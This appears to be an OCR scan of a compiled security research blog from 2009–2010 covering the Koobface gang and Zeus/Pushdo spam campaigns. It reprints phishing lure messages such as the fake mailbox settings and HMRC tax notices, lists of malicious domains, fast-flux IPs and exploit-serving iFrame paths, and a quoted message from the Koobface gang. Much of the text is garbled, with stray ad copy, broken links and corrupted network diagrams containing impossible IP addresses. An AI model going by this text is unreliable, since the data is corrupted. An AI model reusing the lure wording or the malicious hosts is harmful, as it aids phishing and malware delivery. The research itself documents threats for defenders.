Mu Test Suite: Auto Test Generation How to Orive 
Improve Test Coverage; Save Time, $ Better Gusiness 
Adobe has released a crtxal patch to cover a paw of serous Outcomes wth 
vulnerabéties affecting the Adobe Flash Media Server (FMS) Network Security Scanner Excepexmal Wed 
3.5.2 and earber versions. The update ts avaiable for all See & Control Any Dewce on the Expenerxes 
platforms and addresses issues that allow an attacker to run Network in Real Time! Download the 
makoous code on the affected system. Read the it of thes 
o Orta Busmess 
Agility through SOA 
Commectiety & 
December 17th, 2009 
Cisco patches critical WebEx security holes Recent Entries 
Linking Deasions 
Categeston: Aare: Cote feu: Bones Cate et Coral of Serce update and Information for 
nanan = Orgarezatonal 
Youu Secuity) Wabi. Communications inc, Patch Manes: mate Saher ‘. Adobe plugs gapwng holes in Flash Meda Performarce 
Sn + ° e Read the Tom 


The end of the year naturally means a rush to come up with ‘best of the best’ top lists 
consisting of your finest content. However, based on personal observations, during the 
holidays season the short attention span of the average reader becomes even shorter with 
everyone looking forward to taking a well-deserved break. Therefore, the first working week 
of the new year appears to be the perfect moment to summarize some of my most insightful 
posts/analysis published at [1]ZDNet’s Zero Day for 2009. 


The following ten posts have been featured due to their insightful content, comprehensiveness 
of the topic covered, and due to plain simple exclusivity in the time of their publishing. You 
will be, of course, missing the big picture if you don’t keep track of [2]Ryan Naraine’s coverage. 


Thank you for being a [3]Zero Day reader! 


01. [4]Microsoft study debunks phishing profitability 

02. [5]Inside BBC’s Chimera botnet 

03. [6]China’s ’secure’ OS Kylin - a threat to U.S offsensive cyber capabilities? 
04. [7]Microsoft study debunks profitability of the underground economy 
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05. [8]lranian opposition launches organized cyber attack against pro-Ahmadinejad sites - 
[9]Related coverage 

06. [10]The Ultimate Guide to Scareware Protection 

07. [11]’Anonymous’ group attempts DDoS attack against Australian government (Operation 
Didgeridie) 

08. [12]Google’s CAPTCHA experiment and the human factor 

09. [13]Does software piracy lead to higher malware infection rates? 

10. [14]Koobface botnet enters the Xmas season 


Related posts: 

[15]Summarizing Zero Day’s Posts for January, 2009 
[16]Summarizing Zero Day’s Posts for February, 2009 
[17]Summarizing Zero Day’s Posts for March, 2009 
[18]Summarizing Zero Day’s Posts for April, 2009 
[19]Summarizing Zero Day’s Posts for May, 2009 
[20]Summarizing Zero Day’s Posts for June, 2009 
[21]Summarizing Zero Day’s Posts for July, 2009 
[22]Summarizing Zero Day’s Posts for August, 2009 
[23]Summarizing Zero Day’s Posts for September, 2009 
[24]Summarizing Zero Day’s Posts for October, 2009 
[25]Summarizing Zero Day’s Posts for November, 2009 
[26]Summarizing Zero Day’s Posts for December, 2009 


This post has been reproduced from [27]Dancho Danchev’s blog. 


1. : : 

2. 
3 

4 
5 
6. ; 
7. 
8. 
9 


http://blogs.zdnet .com/securit 


. http: //ddanchev. blogspot .com/2009/06/iranian-opposition-ddos-es-pro.htm 
10. 
11. 
12. 


ttp://blogs.zdnet .com/security/?p=338 


13. http://blogs.zdnet.com/security/?p=460 
14. http://blogs.zdnet .com/security/?p=5001 


. http: //ddanchev. blogspot. com/2009/02/summarizing-zero-days-posts-for- january .htm 


16. http: //ddanchev.blogspot .com/2009/03/summarizing-zero-days-posts-for.htm 
17. http: //ddanchev. blogspot .com/2009/03/summarizing-zero-days-posts-for-march. htm 


. http: //ddanchev.blogspot .com/2009/05/summarizing-zero-days-posts-for-april.htm 


19. http: //ddanchev.blogspot .com/2009/06/summarizing-zero-days-posts-for-may.htm 


. http: //ddanchev. blogspot . com/2009/07/summarizing-zero-days-posts-for-june. htm 


. http: //ddanchev. blogspot . com/2009/08/summarizing-zero-days-posts-for-july.htm 


22. http://ddanchev. blogspot .com/2009/09/summarizing-zero-days-posts-for-august.htm 
23. http: //ddanchev. blogspot .com/2009/10/summarizing-zero-days-posts-for.htm 

. http: //ddanchev. blogspot .com/2009/11/summarizing-zero-days-posts-for-october .htm 
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25. http://ddanchev. blogspot .com/2009/11/summarizing-zero-days-posts-for.htm 
26. http://ddanchev. blogspot .com/2010/01/summarizing-zero-days-posts-for.htm 
27. http://ddanchev.blogspot.com/ 


6.1.3 Top Ten Must-Read DDanchev Posts For 2009 (2010-01-04 22:37) 


Our team, so often called “Koobface Gang”. expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


® Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

® Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of 
course analyzing software under VM Ware; 

@ Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes ve've ever made; 

@ Cisco for their 3rd place to our software in their annual “working groups awards"; 

® Soren Siebert with his great article; 

®@ Hundreds of users who send us logs, crash reports, and wish-lists. 


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us 
mnove ahead, And we've moved, And will move. Improving their security system. 


By the way, we did not have « cent using Twitter's traffic. But many security issues tell the world we did. They are wrong, 

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data, And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it :) 

Wish you @ good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang”. 


The following ten posts have been featured due to their insightful content, comprehensiveness 
of the topic covered, and due to plain simple exclusivity in the time of publishing, and not 
necessarily based on page views. 


Thank you for being a regular reader of my personal blog. Feel free to subscribe to 
[1]my RSS feed, keep track of [2]my posts at ZDNet’s Zero Day, or [3]follow me on Twitter. 


01. [4]Conficker’s Scareware/Fake Security Software Business Model 

02. [5]Koobface Botnet’s Scareware Business Model - Part One and [6]Part Two 

03. [7]lnside a Money Laundering Group’s Spamming Operations 

04. [8]A Peek Inside the Managed Blackhat SEO Ecosystem 

05. [9]lranian Opposition DDoS-es pro-Ahmadinejad Sites 

06. [10]Koobface Botnet Redirects Facebook’s IP Space to my Blog 

07. [11]Standardizing the Money Mule Recruitment Process 

08. [12]Koobface Botnet Starts Serving Client-Side Exploits 

09. The SMS Ransomware series - [13]SMS Ransomware Displays Persistent Inline Ads; 
[14]SMS Ransomware Source Code Now Offered for Sale; [15]3rd SMS Ransomware Variant 
Offered for Sale; [16]4th SMS Ransomware Variant Offered for Sale; [17]5th SMS Ransomware 
Variant Offered for Sale; [18]6th SMS Ransomware Variant Offered for Sale 

10. [19]The Koobface Gang Wishes the Industry "Happy Holidays" 


This post has been reproduced from [20]Dancho Danchev’s blog. 
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. http: //feeds. feedburner. com/DanchoDanchevOnSecurityAndNewMedia 


. http: //updates .zdnet.com/tags/danchotdanchev.html?o=14mode=rss 


. http: //twitter .com/danchodanche 


. http: //ddanchev. blogspot .com/2009/04/confickers-scarewarefake-security.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot . com/2009/09/koobface-botnets-scareware~business. html 
6 
7 
8 
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. http: //ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 


. http: //ddanchev. blogspot .com/2009/05/inside-money- laundering-groups- spamming .htm 


. http: //ddanchev. blogspot .com/2009/06/peek- inside-managed-blackhat-seo.htm 


ttp://ddanchev. blogspot .com/2009/06/iranian-opposition-ddos-es-pro.htm 


10. http: //ddanchev.blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
11. http: //ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment .htm 
12. 
13. http://ddanchev.blogspot .com/2009/09/sms-ransomware-displays-persistent.htm 

14. http: //ddanchev.blogspot.com/2009/05/sms-ransomware-source-code-now- offered. htm 
15. 
16. http: //ddanchev.blogspot .com/2009/07/4th- sms-ransomware-variant-offered-for.htm 
17. http: //ddanchev .blogspot .com/2009/07/5th- sms-ransomware-variant-offered-for.htm 
18. http://ddanchev.blogspot .com/2009/08/6th- sms-ransomware-variant-offered-for.htm 
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6.1.4 Scareware, Blackhat SEO, Spam and Google Groups Abuse, Courtesy of the 
Koobface Gang (2010-01-08 17:29) 


The Koobface gang is known to have embraced the potential of the “underground multi- 
tasking" model a long time ago, in order to achieve the "malicious economies of scale" effect. 
This “underground multi-tasking" most commonly comes in the form of multiple monetization 
campaigns, which upon closer analysis always lead back to the Koobface gang’s infrastructure. 
In fact, the gang is so obsessed with efficiency, that particular redirectors and key malicious 
domains for a particular campaign, are also, simultaneously rotated across all the campaigns 
that they manage. 


For instance, throughout the past half an year, a huge percentage of the malicious in- 
frastructure used simultaneously in multiple campaigns, was parked on the [1]now shut down 
Riccom LTD - AS29550. From the [2]massive blackhat SEO campaigns affecting millions of 
legitimate web sites managed by the gang, to the [3]malvertising attack at the New York 
Times web site, and [4]the click-fraud facilitating [5]Bahama botnet, the Koobface botnet 
is only the tip of the iceberg for the efficient and fraudulent money machine that the gang 
operates. 


In this analysis, I'll once again establish a connection between the ongoing blackhat SEO 
campaigns managed by the gang ([6J/Blackhat SEO Campaign Hijacks U.S Federal Form Key- 
words, Serves Scareware; [7]U.S Federal Forms Blackhat SEO Themed Scareware Campaign 
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Expanding; [8]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign), 
with a spam campaign that’s also syndicated across multiple Google Groups, and the Koobface 
botnet itself, with a particular emphasis on the scareware monetization taking place across all 
the campaigns. 


Related Koobface research and analysis: 

[9]The Koobface Gang Wishes the Industry "Happy Holidays" 
[10]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[11]Koobface Botnet Starts Serving Client-Side Exploits 

[12]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[13]Koobface Botnet’s Scareware Business Model - Part Two 
[14]Koobface Botnet’s Scareware Business Model - Part One 
[15]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[16]New Koobface campaign spoofs Adobe’s Flash updater 
[17]Social engineering tactics of the Koobface botnet 

[18]Koobface Botnet Dissected in a TrendMicro Report 
[19]Movement on the Koobface Front - Part Two 

[20]Movement on the Koobface Front 

[21]Koobface - Come Out, Come Out, Wherever You Are 
[22]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [23]Dancho Danchev’s blog. 


1. http: //ddanchev. blogspot .com/2009/12/koobface-friendly-riccom-1td-as29550. htm 
2. http: //ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
3, http://adanchev blogspot. con/2009/09/akrainian-fan-club-features. ntl 

4. hetp://otogs canst. con/aecarsty/Tprasad 

5. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.htm 

6. http: //ddanchev blogspot . com/2009/08/blackhat-seo-campaign-hijacks-us. html 

7. http://ddanchev. blogspot . com/2009/08/us-federal-forms-blackhat-seo-themed.htm 
8. http: //ddanchev. blogspot . com/2009/08/dissecting-ongoing-us-federal-forms.htm 

9. http: //ddanchev blogspot . com/2009/12/koobface-gang-wishes~industry-happy . htm] 


10. http://ddanchev. blogspot .com/2009/12/koobface-friendly-riccom-1td-as29550.htm 
11. http://ddanchev. blogspot .com/2009/11/koobface-botnet-starts-serving-client .htm 
12. http://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
13. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 

14. http://ddanchev. blogspot .com/2009/09/koobface-botnets-scareware-business. htm 

15. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
16. http://blogs.zdnet .com/security/?p=4594 

17. http://content .zdnet .com/2346-12691_22-352597 .htm 

18. http://ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.html 
19. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 

20. http://ddanchev. blogspot . com/2009/08/movement - on-koobface-front.htm 

21. http://ddanchev. blogspot . com/2009/07/koobface- come- out-come-out-wherever-you. htm 
22. http://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 

23. http://ddanchev.blogspot.com/ 
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6.1.5 Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 
(2010-01-08 23:53) 


e-mail service: 


new settings file for fx@ mailbox 


Microsoft’ Office 


©'2 Outlook Web Access 


Provided by Microsoft Exchange Server 2003 


The default settings of your mailbox were automatically changed, Please download and 
launch a file with a new set of settings For your e-mail account: 


fx-settings-file.exe 


Security 


We constantly work on the quality level of our service, as well as on the development of its 
security and protection. During the last upgrade several essential improvements were 
adopted, such as new ports For the POP3 & SMTP protocols, plus the SMTP autentification. 
The new settings are necessary for those who use the mailings clients (For ex. Microsoft 
Outlook, The Bat!, Mozilla Thunderbird etc.) or those who use our service via the web- 
interface, 


UPDATED: Sunday, January 10, 2010 - The post has been updated with the latest domains 
spammed within the past 24 hours. 


UPDATED: Saturday, January 09, 2010 - The post has been updated with the latest do- 
mains spammed within the past 24 hours. The spam campaign is ongoing. 


A currently ongoing spam campaign is using the "Your default mailbox settings have changed" 
theme, in order to infect gullible users into executing Trojan-Spy.Win32.Zbot ([1]settings- 
file.exe). 


Sample message: 


"The default settings of your mailbox were automatically changed. Please download and 
launch a file with a new set of settings for your e-mail account: fx-settings-file.exe. 
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We constantly work on the quality level of our service, as well as on the development of 
its security and protection. During the last upgrade several essential improvements were 
adopted, such as new ports for the POP3 & SMTP protocols, plus the SMTP autentification. The 
new settings are necessary for those who use the mailings clients (for ex. Microsoft Outlook, 
The Bat!, Mozilla Thunderbird etc.) or those who use our service via the web-interface." 


Sample campaign structure: molendf.co .kr/owa/service _directory/settings.php?email=fx@yahoo.co 
m &from=yahoo.com &fromname=fx 
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Fast-fluxed seed IPs: 
61.64.170.232 
77.126.141.142 
188.56.139.174 
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189.110.244.68 
189.179.13.36 
190.82.217.255 
195.174.109.241 
200.169.71.144 
201.232.187.200 
201.236.48.117 
210.106.80.90 
218.153.64.25 
221.26.184.25 
59.92.58.166 
61.20.133.88 
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DNS servers of notice: 

ns1.moorcargo .net 

ns1l.aj-realtors .com - Email: support@ajr.com 

ns1.groupswat .com 

ns1.elkins-realty .net - Email: BO.la@yahoo.com 

nsl.nocksold .com - Email: termer@counsellor.com 

nsl.seldomservice .net - 89.238.165.195 - Email: pp0271@gmail.com 
ns1.viking-gave .net - 89.238.165.195 - Email: glonders@gmail.com 
ns1.controlpanellsolutions .com - 212.95.50.175 - Email: jobowes@clerk.com 


Hundreds of typosquatted subdomains reside within the following currently active do- 
mains: 

ujjiks.co .im 
ujjiks.com .im 
ujjiks.org .im 
ujjikx.co .im 
ujjikx.com .im 
ujjikx.org .im 
molendf.co .kr 
molendf .com 
molendf .kr 
molendf.ne .kr 
molendf.or .kr 
vcrssd1 .cc 
vcrssd1 .eu 
vfrtssd .com 
vsmprot.co .uk 
vsmprot .com 
vsmprot .eu 
vsmprot.me .uk 
vsmprot.org .uk 
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yhuttte.or .kr - Email: scepterpdg@chemist.com 
yhuttti.or .kr - Email: scepterpdg@chemist.com 
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yhutttr.or .kr - Email: scepterpdg@chemist.com 
yhutttu.or .kr - Email: scepterpdg@chemist.com 
yhutttr .kr - Email: scepterpdg@chemist.com 
yhutttu .kr - Email: scepterpdg@chemist.com 


912.223.160.860 —_—— e100 223.260.0022) Em 518001 
1142732229 ——Le > 114.27.00"16 —————____“2_______» sez 
A 
39.77 223.246 — BL 0728 le S241 
a 
A 188.129.179.24 —MEL ge 195.129.128.008 Al 520771 
" 
198.129.188.211 199.179.0.019 ———______+*__________» 459151 
WY 
4, 189.179.1215 ere 51-189-179-12-185- ayn prod-infintum com mx 
—. 
228.153.646.25 —— Ey 218: 1520.03 
112.187.222.228 ———SSL—_____———  ® 112176.0.012 = 
4 ner 
190.240.246.225 es 155,140,000 me AS1I909 
a 
200.90.203.115 ——— Ee 200.90.203.028 ———————_____*s_ s7sis 
- 203.13.153.28 ——_ML ee 20) 130.06 ——_———————————— A 5270899 
\ Q 200.265,178,253 el 291.164.0005 a AS13999 
i 
‘* wet AS 
201.232.2223) ———“2—_—_______m» 201232222023 ————____*_______ 45149 
A 
220.6659, 206 EL, 2209, 6658S AS10071 
nS 
» 5B.64.102.2106 el SBME. mS AS17SNS 
wt = 899.238.165.195 ———_—______™@=!___s» 992381280718 —————_—“2_m 4533970 
" nsl Mking gave net 24-171-13-91 dhcp sts mo.chartercom 
ill 
v Ns2.seldomsenice net. —A——————g 24,171.13.) Lm 92iiri 0. —————— im 452015 
ns2Mkinp-gave met ——A gs 95 294995 0) ld gy sy 35 telco come 
ner 
cokr 196.214.128.018 ——— tinge ASBTOS 


ujyhl.ne .kr - Email: combinetct@financier.com 
ujyho.ne .kr - Email: combinetct@financier.com 
ujyhf .kr - Email: combinetct@financier.com 
ujyhl .kr - Email: combinetct@financier.com 
ujyhf.co .kr - Email: combinetct@financier.com 
ujyhl.co .kr - Email: combinetct@financier.com 
ujyho.co .kr - Email: combinetct@financier.com 
ujyhs.co .kr - Email: combinetct@financier.com 
ujyho .kr - Email: combinetct@financier.com 
ujyhf.or .kr - Email: combinetct@financier.com 
ujyhl.or .kr - Email: combinetct@financier.com 
ujyho.or .kr - Email: combinetct@financier.com 
ujyhs.or .kr - Email: combinetct@financier.com 
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ujyhs .kr - Email: combinetct@financier.com 


cob.netuljiks.co.im 


uP 


ieee 188.56.0.0/16 ———___——“S-> 4s16135 


189-110-244-68.dsl.telesp.netbr 


188.56.139.174 


la 
189.110.244.68 ——WEL gy 999.110.0.0/16 ge AS27699 


ds!-189-179-13-36-dyn.prod-infinitum.com.mx 
Ld 
189,179.13,36 ——N&L__» 199179.0.0119 ————_———_4&-_-» ass151 
189,195,92.60 ——NE&L_____s» 199192.0.0/13 ————_——_—_4S_m» asi3999 
195.174.109.241 ——MEL_—__ 195,174.0.0117 ————_—_—_—_—_4S- 9121 


200.110.183.95 ——M&lL____g 200.110.192.023 ————_—_—_—_4&-m» s27891 


201.236.48.117 ——MEL___ gs 201.236.48.0/22 


AS 
AS7418 


— 
190.82.217.255 ——£2—________m 190.82192.0/18 


200.169.71.144 ——WEL dg, 290. 169.64.0/20 ————————————AS ge 512140 
201.232.187.200 ——WEL dg 201 232.:184.0/21 ——__—_—————__—AS_-ge asi34a9 
218.153.64.25 ——_—_MEL dg 918.152.0013 

210.106.8090 ———MEL__ gy 910 106.80.0/21 AS4766 
221,26.184,25 ——WEL_ =» 0991 26.0016 ———__—______4_m» as17676 
61,20.133.88 ——N&L__ ss 661 290.128.0119 ———————45-_-_» asg674 
61.64.170.232, ——NEL____» 61.64.128.0/71¢ ————_—_—_——S_ asieis2 


net.ujjiks.co.im 


Seen within the past 24 hours, now offline domains part of the campaign: 


yhe3essa .com.pl 
yhe3essd .com.pl 
yhe3esse .com.pl 
yhe3essf .com.pl 
yhe3essg .com.pl 
yhe3essi .com.pl 
yhe3esso .com.pl 
yhe3essp .com.pl 
yhe3essq .com.pl 
yhe3essr .com.pl 
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yhe3esss .com.pl 
yhe3esst .com.pl 
yhe3essu .com.pl 
yhe3essw .com.pl 
yhe3essy .com.pl 
ok9iiol .com 
ok9iio2 .com 
ok9iio3 .com 
ok9ii04 .com 
ok9ii0o5 .com 
ok9ii06 .com 
ok9iio7 .com 
ok9ii08 .com 
ok9iiol .net 
ok9iio2 .net 
ok9iio3 .net 
ok9iio4 .net 
ok9iio5 .net 
ok9ii06 .net 
ok9iio7 .net 


Upon execution the sample phones back to the already [2]blacklisted by the Zeus Tracker 
nekovo .ru: 

nekovo .ru/cbd/nekovo.bri; nekovo .ru/ip.php - 109.95.114.70 - Email: kievsk@yandex.ru - 
AS50215 - Troyak-as Starchenko Roman Fedorovich. 


Related Zeus crimeware name servers respond to the same IP: 

- nsl.trust-service .cn - (domain itself [3]responds to 193.104.41.133) - Email: olezhios- 
apiel@yahoo.es 

- ns1.elnasa .ru - (domain itself [4]responds to 91.200.164.12) - Email: kievsk@yandex.ru 

- nsl.recessa .ru - (domain itself [5]responds to 193.104.41.69) - Email: kievsk@yandex.ru 

- nsl1.stomaid .ru - (domain itself [6]responds to 91.200.164.10) - Email: kievsk@yandex.ru 


Parked withn the same AS, are also the following currently active Zeus crimeware serv- 
ing domains: 

web-information-services .com - 91.198.109.69 - Email: pita@bigmailbox.ru 

erthjuyt44u .com - 91.198.109.19 - Email: rails@qx8.ru 

excellenthostingservice .com - 91.198.109.48 - Email: xm@qx8.ru 

goldhostingservice .com - 91.198.109.32 - Email: clod@qx8.ru 


Pretty much your typical cybercrime-friendly virtual neighborhood. 

Related posts: 

[7]Pushdo Injecting Bogus Swine Flu Vaccine 

[8]"Your mailbox has been deactivated" Soam Campaign Serving Crimeware 
[9]Ongoing FDIC Soam Campaign Serves Zeus Crimeware 

[10]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [11]Dancho Danchev’s blog. 
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5 oer / ete imustiotel-con/anal 35 /25efaeeeS69851 abbas fdec6e82207£1 2948707 Ste0 1ES9857948099! S14 7e” 12828 //wiw.virustotal .com/analisis/26efaeec869a3labb49f dcc6ef82207f 1234£92b73de01589e8294a053f 31d7b- 12629 
ttps://zeustracker.abuse.ch/monitor. https: //zeustracker.abuse.ch/monitor .php?host=nekovo.ru r 


sg: /eeurtacer, ime h/aclionppTioni=enat trust-service.cn 


ttps://zeustracker.abuse.ch/monitor. https: //zeustracker . abuse .ch/monitor . php?host=elnasa.ru r 
https://zeustracker.abuse.ch/monitor.php?host=recessa.r 
ttps://zeustracker.abuse.ch/monitor.php?host=stomaid.r 


ttp://ddanchev. blogspot .com/2009/12/pushdo-injecting-bogus-swine-flu.htm 
http: //ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.htm 


: 


h re ://ddanchev . blogspot . com/2009/10/ongoing-fdic-spam-campaign-serves-zeus .htm 


. http://ddanchev. blogspot .com/2009/07/multitasking-fast-flux-botnet-that.htm 
11. http://ddanchev. blogspot .com/ 


6.1.6 Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 
(2010-01-13 21:10) 


* <script per "ctext/ javascript” lan er sateen pel src-"gcxyipt.ia”*></script> 
=f : 4 olor="#3dSta3 900000"> 


vidth="0" ight="0 it 
tandardTable” bgcolor="#3dStfa3” border="0" celipadding="0" celispacing="0" height«"100%" vidth=”"100%"> 


he 


<table clas 
<tbody><tr heigh 
<td vidthe"33t" yanbeps 
ced widthe"33%">énbap: </td 
<td vidth="34%">énbsp: a> 


<td vidthe"33%">énbsp; </td 
<td valigne”"top” widthe"33%" 


<table class*"mainTable” bgcolor="#£LLffL2" border="0O" cellpadding="0" cellspacing="0" vwidcth="550"> 

<tbhody><tr> 

<td><img er cw" CookicaAuth 004,012" vidth="10"></td> 

<td valign="top” height-"1003"> 

<table class*"standardTable” border*"0" celipadding»"0" cellspacing="0" height="100e" width="10087> 
thody><tr><td height#"i00&" width="100t"><img src-"CookicAuth.gil” border#"0" height#""421" widthe"76"></td></tr 
</ thody></table></td> 


<td><imy sre="CookieAuth 004,012" width="5"></ed> 


<td valign="top” vidth="100%"> 


<table dire"LTR® bgcolor="#fffffft” border="0" cellpadding="0" celispacing*"0” vidth="100%"> 
<tbody><tr 
td style="padding-top: iSpx:” align="right” valign="top” height#"i20" width=*"100%"> 

p><img erc="CookieaAuth 003.gi2”" border="0" height="i2" hapace=*"1i0" width="S9"></p> 


UPDATED, Friday, 15, 2010: The gang continues rotating the campaigns by targeting different 
brands. Over the 24 hours they’ve spamming the well known "Notice of Underreported In- 
come" theme this time targeting HM Revenue and Customs (HMRC), and have also introduced 
new portfolios of typosquatted domains next to changing the client-side exploits serving 
iFrame embedded on each and every page. 
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HMRC home Contact us | Help 


ch) HM Revenue 


& Customs 


Fraud Application 


Your Progress 


v Tax Notice Received on e-mail 
> Tax Statement 


Tax Statement 


Taxpayer ID: bal-00000368240818UK 
Tax Type: INCOME TAX = ae 
Issue: Unreported/Underreported Income (Fraud Application) 


Filing and paying your federal taxes correctly and on time is an important part of living and working in the United 
Kingdom. 
Please review (download and execute) your tax statement: 


If the statement is incorrect, contact our Taxpayer Advocate Service. 


© Crown Copyright | Terms & Conditions | Privacy policy | Accessibility 


- Sample message: "Filing and paying your federal taxes correctly and on time is an important 
part of living and working in the United Kingdom. Please review (download and execute) your 
tax statement. If the statement is incorrect, contact our Taxpayer Advocate Service." 

- Sample URL: online.hmrc.gov.uk.olpiku5v_ .com.pl/SecurityWebApp/httpsmode/stateme- 
nt.php 


Detection rates for tax-statement.exe ([1]Trojan-Spy.Win32.Zbot.gen) and file.exe ([2]Trojan- 
Spy.Win32.Zbot.gen). Upon execution, the samples attempt to connect to elnasa 
.ru/asd/elnasa.ble (109.95.114 .71/asd/elnasa.ble). 


The structure of the iFrame, now using an IP address instead of a domain name, remains the 
same: 

- 109.95.114.251 /uks1/in.php - 109.95.114.251 - AS50369 - VISHCLUB-as Kanyovskiy Andriy 
Yuriyovich - akanyovskiy@troyak.org 

- 109,.95.114.251 /uks1/jquery.jxx 

- 109.95.114.251 /uks1/xd/pdf.pdf 

- 109.95.114.251 /uks1/load.php 

- 109.95.114.251 /uks1/file.exe 
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The site is closed for redesign 


For support and connection, please call: (095)2734191, e-mail:support@ctlan.net. 


DNS servers of notice: 

nsl.pds-properties .com - 89.238.165.195 

nsl.noeproperties .com - 84.243.201.159 

nsl1.densondatabase .com - 94.23.177.147 

nsl.dogsgrem .net - 89.238.165.195 - Email: glonders@gmail.com - Email seen in [3]previous 
domain registrations 


Typosquatted domains spammed over the past 24 hours: 
olpiku5a .com.pl 
olpiku5b .com.pl 
olpiku5c .com.pl 
olpiku5d .com.pl 
olpiku5e .com.pl 
olpiku5f .com.pl 
olpiku5g .com.pl 
olpiku5q .com.pl 
olpiku5r .com.pl 
olpiku5s .com.pl 
olpiku5t .com.pl 
olpiku5v .com.pl 
olpiku5w .com.pl 
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olpiku5x .com.pl 
olpiku5z .com.pl 


ujo9ia .com.pl 
ujo9id .com.pl 
ujo9ie .com.pl 
ujo9if .com.pl 
ujo9ig .com.pl 
ujo9ih .com.pl 
ujo9im .com.pl 
ujo9in .com.pl 
ujo9iq .com.pl 
ujo9ir .com.pl 
ujo9is .com.pl 
ujo9it .com.pl 
ujo9iw .com.pl 
ujo9iy .com.pl 
ujo9iz .com.pl 
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online _hmre_gov.uk. olpikuSv.com.p! 


t11llut .me.uk 
t11luy .me.uk 
t111luz .me.uk 
t111luk .org.uk 
t11llut .org.uk 
t111luz .org.uk 
t11l1luk .co.uk 

t111luy .co.uk 


okiolh .ne.kr 
okiolw .ne.kr 
okiolh .kr 
okiolh .co.kr 
okiolu .co.kr 
okiolv .co.kr 
okiolw .co.kr 
okiolh .orkr 
okiolu .orkr 


122.135.192.105 ———“E-ge 112.135.192.019 ——“S—g> 459329 
126.74,103,135 ————NEE_-g> 116.74,103.0/24 ——“S-> asizsas 
117.204.51.195 ——_NETE gy 117.204.48.0/20 
127.204.85.212. ————“—> 117.204.90.0/20 


$ 
59.95.11.74 ————"*l__» 59.950 «SS 


AS 
117.195.968.186 ——-_EZ ge 117.195.96.0/20 —v_ 


AS9829 


117.196.4.108 ————“S2—> 117.196.0.020 y 


117.201.14.80 ————_NEE_-g® 117.201.0.0/20 


119.152.32.189 ——_—_—MEL gy 119152.32.0/21 ——SSge AS17557 


122.590.131.199 ————“EL_ge 122.50.128.0117 ——“S-ge 4823772 


123,50,161.208 ————NEE_-ge 123.50,161.0/24 ——“S-p> asasase 


188.129.179.264 ——_»_NEE_gy 198.129.128.018 ——Ad-ge 4520771 


62.248.41.28 ——“E>__-g> 6§2.248.0.0117 ——“S—m> 459121 
95,58,23.101 —————NEEL_g® 9558.0.0/19 — sa 

7 AS91989 
9246.28.65 ——_MEL__gy 92 46.28.0/23 


hmre.govuk olpikuSv.com.pl 
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okiolv .orkr 
okiolw .orkr 
okiolu .kr 
okiolv .kr 
okiolw .kr 


proterp1 .im 
virtdit1 .im 
virtdit2 .im 
virtdit3 .im 
virtdit4 .im 
virtdit5 .im 
virtdit6 .im 
virtdit7 .im 
virtdit8 .im 


UPDATED: Gary Warner offers additional insights into the latest campaigns - [4]This Week in 
Avalanche / Zbot / Zeus Bot: HSBC & eBay. 


What the botnet masters forget is that with each and every campaign, based on a num- 
ber of factors, they reveal more about themselves and their affiliations within the cybercrime 
ecosystem. The degree of monetization is proportional with the loss of OPSEC (operational 
security), and this remains valid for any fraudulent campaign, botnet or cybercrime community 
in general. 


UPDATED: To clarify, in this campaign Pushdo acts as [5]the spam platform for the 
[6]Avalanche/MS-Redirect botnet. 


In need of a good example why you shouldn’t be interacting with spam/phishing emails 


in any other way but reporting/deleting them, unless of course you’re in the business of 
analyzing them? 
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> ‘ aS * 
112.167.222.776 ——_—_#_—_—_—<—r our ASG 


? y A 
1142733183 ——A—<—$—$—$ > 114.270.0916 ——___—*i-> s3462 


ie ge 123,237,72.0021 em S181 
123.237.77.3 
125.0.0.0915 —————___+— 52510 


125.0.40.185 ————g nitkyo377285 myo.nttth ppp.intoweb.ne jp 


186.82.103.166 ———WEL_» 1969296.0/21 ———————“&-_» 510620 
188.129.179.24 ————_WEL dg 199.129.178.018 ——___—_4S-ge 4520771 
4 189.104.1137 ———_-HEL lg 199:108.0.019 ———__4i-_-m» 57736 
y 189.220.41.195 — HEL gy, 199.220.352.020 — ge AS20554 
4 NET a 
190.142.260.196 BE gy, 190.262.160.022 ge 4521826 
202.42.196,.214 —————________m 201.420.0/16 
; 201.43.66.196 ——W 201 42.00.0015 ———______—*i-m 527899 
AS 
\ Q 189.18.13785 ———“&!______» 199 18.0.0/16 
A 
59.103.87.7 ————_W#&L_» s9103.87.0/24 ———_——_“S-m 517557 
A 
6162.99.36 ——_#EL tm 651 62.64.08 ——_—_—__“2_» 518182 
ws 
89.138.12289 —— Eg 99. 138.0.0/15 —— tg 451680 
